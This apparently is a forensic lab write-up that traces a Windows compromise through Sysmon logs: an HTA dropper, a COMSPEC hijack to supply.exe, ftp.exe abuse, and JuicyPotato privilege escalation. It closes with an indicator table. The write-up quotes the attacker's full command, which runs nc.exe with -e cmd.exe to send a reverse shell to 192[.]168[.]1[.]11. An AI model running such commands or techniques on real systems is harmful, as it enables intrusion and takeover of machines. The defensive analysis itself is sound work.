A Windows endpoint was compromised and Sysmon logs were collected for analysis. The goal is to trace the attacker’s steps from initial access through to privilege escalation, identifying the tools, techniques, and commands used along the way.
The first thing to check is how the attacker got in. Grepping the Sysmon logs for .hta files points straight to the entry:
cat sysmon-events.json | grep -i ".hta"
The file updater.hta shows up as the initial access vector. HTA (HTML Application) files are a classic way to execute arbitrary code on Windows because mshta.exe runs them with elevated scripting privileges and often bypasses simple file-type controls.

Searching for PowerShell activity reveals how the attacker staged their malware:
cat sysmon-events.json | grep -i "invoke"
The Invoke-WebRequest cmdlet was used to pull down a file over port 6969. The attacker also set an environment variable to redirect execution:
comspec=c:\Windows\temp\supply.exe
Setting COMSPEC is a neat trick — normally it points to cmd.exe, so any process that spawns a shell using that variable will execute the attacker’s binary instead.

Looking at the process tree around supply.exe, ftp.exe stands out as a LOLBIN being used to execute malicious commands. ftp.exe is a legitimate Windows binary that can be abused to run commands outside of the normal cmd.exe or powershell.exe path, helping the attacker stay under the radar.
With supply.exe running as the fake COMSPEC, the malware starts executing commands. The first one observed is a basic recon command:
ipconfig
Multiple instances of the same command fire at once, which is consistent with Python-based malware spawning parallel subprocess calls. Checking the dependency events around supply.exe — DLLs loaded, runtime libraries present — confirms the malware is written in Python, likely compiled to an EXE with something like PyInstaller.

The malware then reaches out to download a well-known privilege escalation tool:
hxxps[://]github[.]com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
JuicyPotato is a classic Windows token impersonation exploit that targets COM objects with impersonation privileges. The command line captured in the logs shows the full execution:
C:\windows\temp\supply.exe /c "juicy.exe -l 9999 -p nc.exe -a "192[.]168[.]1[.]11 9898 -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7}"
The attacker used JuicyPotato to launch nc.exe (Netcat), connecting back to 192[.]168[.]1[.]11 on port 9898 with -e cmd.exe to drop a full interactive shell.

| Type | Value |
|---|---|
| File | updater.hta |
| File | supply.exe |
| File | juicy.exe |
| File | nc.exe |
| URL | hxxps[://]github[.]com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe |
| IP | 192[.]168[.]1[.]11 |
| Port | 6969 (malware delivery) |
| Port | 9898 (reverse shell) |
| Port | 9999 (JuicyPotato listener) |
| Registry / Env | comspec=c:\Windows\temp\supply.exe |
| CLSID | {B91D5831-B1BD-4608-8198-D72E155020F7} |